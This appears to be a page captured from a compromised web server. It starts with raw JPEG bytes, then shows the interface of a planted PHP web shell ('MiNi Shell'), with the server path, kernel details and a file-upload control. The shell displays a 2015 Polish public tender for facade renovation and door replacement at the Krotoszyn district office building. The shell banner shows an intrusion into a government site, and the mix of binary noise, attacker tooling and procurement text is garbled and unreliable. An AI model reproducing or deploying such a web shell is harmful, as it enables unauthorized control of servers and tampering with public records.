JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150605/82293-N-2015.html

<p class="kh_header"><b>Krotoszyn: Wykonanie elewacji oraz wymiana drzwi  w  budynku Nr 2 Starostwa Powiatowego w Krotoszynie</b><br>
<b>Numer ogłoszenia: 82293 - 2015; data zamieszczenia: 05.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie elewacji oraz wymiana drzwi  w  budynku Nr 2 Starostwa Powiatowego w Krotoszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie elewacji oraz wymiana drzwi  w  budynku Nr 2 Starostwa Powiatowego w Krotoszynie
ELEWACJA
1)	Załączony projekt zakłada remont elewacji budynku Nr 1 i Nr 2. Niniejszym postępowaniem objęte jest wykonanie jedynie elewacji budynku Nr 2 tutejszego Starostwa.
2)	Charakterystyka budynku 
Budynek Nr 2
Wymiary elewacji ( długość x wysokość )
Elewacja północna: 38.0 x 8.9 m
Elewacja wschodnia: 14.2 x 8.8 m
Elewacja południowa: 38.0 x 8.7 m
Elewacja zachodnia: 17.6 x 8.8 m
Powierzchnia zabudowy budynku nr 1: 572.6 m2
Powierzchnie elewacji:
Budynek Nr 2
elewacja północna 347,1 m2
elewacja wschodnia 173,4 m2
elewacja południowa 333,9 m2
elewacja zachodnia 168,0 m2
                           suma 1022,4
3)	Budynek  użytkowany jest  obecnie przez Starostwo Powiatowe w Krotoszynie. Stanowi część dawnego kompleksu koszarowego zlokalizowanego przy ul. 56 Pułku Piechoty Wielkopolskiej 10 w Krotoszynie. Kompleks koszar pochodzi z końca XIX wieku. W okresie międzywojennym koszary były siedzibą 56 Pułku Piechoty. W okresie powojennym stanowiły nadal siedzibę jednostek wojskowych. Budynek jest obiektem dwukondygnacyjnym krytym dachem stromym. Zbliżonym w rzucie do prostokąta, ustawionego w osi wschód - zachód.
4)	Założono oczyszczenie ceglanych elementów elewacji poprzez hydropiaskowanie pod ciśnieniem lub poprzez chemiczne usunięcie warstw powłok malarskich. W przypadku oczyszczenia przez hydropiaskowanie po piaskowaniu należy uzupełnić uszkodzone fugi między cegłami. Uszkodzone elementy ceglane należy wykuć a następnie w ich miejsce zmontować nowe cegły. Kolorystyka nowych cegieł musi zostać dostosowana do cegieł istniejących odsłoniętych podczas oczyszczenia. Dobór kolorystyki cegieł podlega zatwierdzeniu przez projektanta w trybie nadzoru autorskiego. W obrębie powierzchni tynkowanych należy skuć uszkodzone partie tynkow- tynki głuche lub te z widocznymi ubytkami. Miejsca usuniętych tynków należy uzupełnić zaprawą tynkarską cementowo -wapienną kategorii III. Na wyrezonowaną powierzchnię tynku należy nałożyć cienkowarstwowy tynk silikatowy barwiony w masie. Dobrano kolorystykę tynku z palety firmy Dryvit - kolor morning fog, lub ekwiwalentny. Przed wykończeniem całości elewacji należy wykonać próbki tynku w wybranych przez Projektanta miejscach elewacji. Po wykonaniu próbek kolorystyka musi być zaakceptowana przez Projektanta w trybie nadzoru autorskiego.     Nie przewiduje się wymiany stolarki okiennej


DRZWI ZEWNĘTRZE
5)	Wymianie podlegają  drzwi zewnętrzne
dwuskrzydłowe od strony północnej budynku będące repliką istniejących drzwi wejściowychdwuskrzydłowe drzwi wejściowe od strony zachodniej budynku, przeprojektowane w stosunku do istniejących, będące głównym wejściem o szerokości przejścia 90 cm dostosowanych dla osób niepełnosprawnych
6)	Nowe drzwi należy wykonać z dębowego drewna klejonego z wiernym odtworzeniem konstrukcji i szczegółów ozdobnych drzwi istniejących z wykorzystaniem wszystkich  elementów stalowych, okuć, które należy odzyskać, oczyścić z farby i pomalować w kolorze grafitowym. 

7)	Szczegółowy opis przedmiotu zamówienia określają:
Dokumentacja projektowa, wykonawcza (elewacja)  stanowiąca Załącznik nr 1a  do niniejszej SIWZ 
Szczegółowa  specyfikacja techniczna (elewacja) - stanowiąca Załącznik nr 1b do niniejszej SIWZ
Przedmiar robót (elewacja) - stanowiące Załącznik Nr 1 c do  niniejszej SIWZ
Dokumentacja projektowa (drzwi) - stanowiąca Załącznik Nr 2 a do  niniejszej SIWZ
Przedmiar robót (drzwi) - stanowiąca Załącznik Nr 2 b do  niniejszej SIWZ

8)	Wykonawca w ramach przedmiotu zamówienia zobowiązany jest  do:
wykonania  wszelkich robót przygotowawczych, porządkowych (zagospodarowania placu budowy, utrzymania zaplecza budowy, uprzątnięcia placu budowy i przywrócenia do stanu zastanego) 
oraz wszelkich innych czynności niezbędnych do prawidłowego wykonania przedmiotu zamówienia i użytkowania przez Zamawiającego.

9)	Wykonawca ponosi pełną odpowiedzialność za ewentualne szkody wyrządzone przez jego   działania lub zaniechania i zobowiązany jest do ich naprawy na własny koszt.

10)	Jeżeli w opisie przedmiotu zmówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie wskazaniu temu towarzyszą wyrazy lub równoważne , co oznacza, że dopuszcza się  rozwiązania nie gorsze niż opisane, spełniające wymagania techniczne, funkcjonalne, eksploatacyjne, jakościowe, co najmniej takie jak wskazane w opisie przedmiotu zamówienia Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, funkcjonalnych, eksploatacyjnych i jakościowych, nie gorszych niż przyjęte w dokumentacji.

11)	Wymagany minimalny okres gwarancji na wykonane roboty (materiały i robociznę) wynosi 36 miesięcy od daty bezusterkowego odbioru końcowego. 
Jednym z kryteriów oceny ofert jest  okres na jaki  Wykonawca wydłuży gwarancję.  Dokładny okres gwarancji określony zostanie po wyborze oferty przedstawiającej najkorzystniejszy bilans kryteriów oceny ofert tj. ceny oraz wydłużenie gwarancji

12)	Wykonanie zamówienia:
a)	 Do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów i urządzeń pierwszej jakości o najnowszych rozwiązaniach technologicznych gwarantujących odpowiednią jakość wykonania zamówienia.
b)	Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na zastosowanie (atesty, certyfikaty, aprobaty techniczne, świadectwa jakości, karty gwarancyjne, dokumentację techniczną dźwigu i inne dokumenty świadczące o prawidłowym wykonaniu przedmiotu zamówienia).
c)	Wraz ze zgłoszeniem zakończenia robót,  Wykonawca złoży w formie trwale spiętej wszelkie dokumenty związane z wykonanym przedmiotem zamówienia m.in.:
protokoły z badania materiałów i urządzeń,
dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu zamówienia,
inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia, a odnoszące się do jego realizacji, zwłaszcza rysunki ze zmianami naniesionymi w trakcie realizacji zadania,

13)	Wykonawca jest odpowiedzialny za jakość wykonanych robót, bezpieczeństwo wszelkich czynności na terenie budowy, metody użyte przy budowie oraz za ich zgodność ze SST i poleceniami Inspektora nadzoru.

14)	Przedmiot zamówienia należy wykonać zgodnie z załączoną dokumentacją, wytycznymi określonymi w SIWZ, z wiedzą, sztuką budowlaną, przepisami BHP, ppoż. oraz poleceniami inspektora ze strony Zamawiającego.

15)	Zabrania się stosowania materiałów nieodpowiadających wymaganiom Polskiej Normy i PN EN oraz o innych parametrach niż określone w projekcie.

16)	Prace  obejmujące realizację przedmiotu zamówienia  winny być prowadzone w sposób jak najmniej uciążliwy dla otoczenia z uwzględnieniem godzin ciszy nocnej.

17)	Wszelkie roboty związane z prawidłowym wykonaniem przedmiotu zamówienia muszą być tak zorganizowane przez Wykonawcę, aby nie utrudniały działalności Starostwa Powiatowego w Krotoszynie.
W związku z  przeprowadzaniem robót na  obiekcie użytkowym, należy zachować szczególną  ostrożność i  zminimalizować uciążliwości związane z przeprowadzanymi pracami. Wykonawca winien zapewnić szczególne bezpieczeństwo  interesantom i  pracownikom Starostwa Powiatowego w Krotoszynie.  Zabezpieczenie terenu winno być przeprowadzone w sposób określony w    specyfikacji technicznej wykonania i odbioru robót.
Wykonawca jest zobowiązany do zabezpieczenia terenu budowy w okresie trwania realizacji kontraktu aż do zakończenia i odbioru ostatecznego robót.

18)	Zamawiający dopuszcza częściowy odbiór prac oraz częściowe  fakturowanie wykonanych prac. Podstawę do wystawienia faktury stanowi  pozytywny protokół częściowego lub końcowego odbioru prac potwierdzony przez upoważnionego przedstawiciela stron (inspektora nadzoru, kierownika budowy).

  Istnieje możliwość dokonania wizji lokalnej obiektu po uzgodnieniu telefonicznym -          Kazimierz Serek tel. 62 725-42-56 w. 335

  Prace wyłączone z dokumentacji projektowej, które nie będą  wykonywane  w            ramach    realizacji przedmiotu zamówienia:
wykonanie elewacji budynku Nr 1
wykonanie i montaż klimatyzacji
wymiana stolarki okiennej

  W ciągu 3 dni od podpisania umowy, wykonawca zobowiązany jest do zawarcia  umowy ubezpieczenia budowy na cały okres jej trwania. Ubezpieczeniem należy objąć  wszelkie nieprzewidziane zdarzenia losowe, odpowiedzialność cywilną oraz następstwa nieszczęśliwych wypadków związanych z realizacją przedmiotu umowy Wykonawca przedstawi    Zamawiającemu odpowiedni       dowód zawarcia umowy ubezpieczenia najpóźniej   w  dniu przekazania placu budowy.  Wartość umowy ubezpieczenia winna być nie    mniejsza niż wartość złożonej oferty.

 Podwykonawstwo
1.)	Zamawiający nie dokonuje zastrzeżenia dotyczącego obowiązku osobistego wykonania kluczowych części zamówienia przez Wykonawcę
2.)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczyła będzie podmiotu, na którego zasoby wykonawca powoływał się , na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu określonych w SIWZ, wykonawca zobowiązany będzie wykazać zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
3.)	Zamawiający we wzorze umowy określił  wymagania dotyczące  umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje  zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu
4.)	Zamawiający  we wzorze umowy  określił informacje o umowach o podwykonawstwo, których  przedmiotem są dostawy lub usługi, które podlegają obowiązkowi przedkładania zamawiającemu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.44.30.00-4, 45.41.00.00-4, 45.26.25.00-6, 45.45.30.00-7, 45.26.21.00-2, 45.42.10.00-4, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2.000,00 zł (słownie: dwa tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  co najmniej jedną robotę budowlaną polegającą na wykonaniu lub remoncie elewacji  budynku o wartości brutto min. 200.000,00 zł z podaniem rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dowodów  potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Dowodami, o których mowa powyżej są:poświadczenie
inne dokumenty- jeżeli z uzasadnionych przyczyn o obiektywnych charakterze wykonawca nie jest w stanie  uzyskać poświadczenia, o którym mowa powyżej. Dokumenty te muszą zawierać przyczyny, z powodu których,  wykonawca nie ma możliwości uzyskania poświadczenia  W przypadku gdy wykonawca wskazuje w wykazie roboty budowlane wykonane na rzecz  zamawiającego, nie ma obowiązku przedkładania ww. dowodów.
na podstawie wykazu,  na zasadzie spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku  dotyczącego dysponowania   osobami zdolnymi do wykonania zamówienia, zostanie dokonana na podstawie  wykazu osób przewidzianych do realizacji zamówienia. Warunek zostanie spełniony, jeśli Wykonawca przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, z  informacją  o podstawie do dysponowania tymi osobami. 
Wykaz powinien potwierdzać dysponowanie min. jedną osobą, która pełnić będzie funkcje kierownika budowy   posiadającą  uprawnienia  do wykonywania samodzielnych funkcji technicznych w budownictwie, w specjalności konstrukcyjno - budowlanej, bez ograniczeń.  Do przedmiotowego wykazu należy dołączyć  oświadczenia, że osoba/-y, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia,  o których mowa powyżej.

W przypadku składania oferty przez wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych uprawnień, uzyskane w innych państwach na zasadach określonych w ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394)
Osoby spoza terytorium Rzeczpospolitej Polskiej muszą się legitymować decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług transgranicznych, wydanymi przez właściwe rady izby inżynierów, albo udokumentować, że zdały egzamin na uprawnienia budowlane przed właściwą Izbą. Zgodnie z przepisami prawa budowlanego zakres uprawnień budowlanych kierownika budowy i kierowników robót branżowych powinien pozwalać na prowadzenie robót  w zakresie przewidzianym w dokumentacji projektowej.
na podstawie wykazu,  na zasadzie spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Wydłużenie gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy:
1)	Obniżenie wynagrodzenia - W przypadkach określonych  w § 5 ust. 1 i 2  umowy,  tj. w przypadku  zmniejszenia  zakresu robót,  wykonania robót zamiennych  
2)	Dopuszcza się zmianę osoby (kierownika budowy)  przeznaczonej do realizacji zamówienia  przez Wykonawcę. W takim przypadku, Wykonawca do realizacji przedmiotu zamówienia zapewnia  osoby posiadające    kwalifikacje, uprawnienia nie mniejsze niż określone w warunkach udziału   w postępowaniu,
3)	Dopuszcza się zmianę inspektora nadzoru.
4)	Zmianę podwykonawców i dalszych podwykonawców, na zasoby których Wykonawca powoływał się przy wykazywaniu  spełniania warunków udziału w postępowaniu.  Zamawiający dopuszcza możliwość zmiany podwykonawców i dalszych  podwykonawców, pod warunkiem wykazania zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
2. Przedłużenia terminu  wykonania przedmiotu zamówienia  z przyczyn nie wynikających   ze zwłoki Wykonawcy w  szczególności:
a)	 razie zaistnienia  zdarzeń o charakterze działania siły wyższej, przez która strony rozumieją m.in. klęski żywiołowe, stan wyjątkowy, działania terrorystyczne,  strajk, inne zdarzenia mające charakter siły wyższej; o czas trwania siły wyższej
b)	 w razie udzielenia zamówienia dodatkowego, zgodnie z  art. 67  ust. 1 pkt. 5 ustawy Prawo zamówień publicznych, o okres wykonywania zamówienia dodatkowego.
c)	gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które  Wykonawca ponosi odpowiedzialność.
d)	wystąpienia znalezisk archeologicznych, które mogą skutkować w świetle dotychczasowych założeń nieterminowym wykonaniem prac.
e)	wystąpienia warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej,.
3. Przedłużenia terminu  wykonania przedmiotu zamówienia  z powodu wystąpienia okoliczności, za które odpowiada Zamawiający, w szczególności,  które będą  następstwem nieterminowego przekazania placu budowy, konieczności dokonania zmian w dokumentacji projektowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat krotoszyn.bip.net.pl
lub 
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2015 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 21.07.2015.</p>





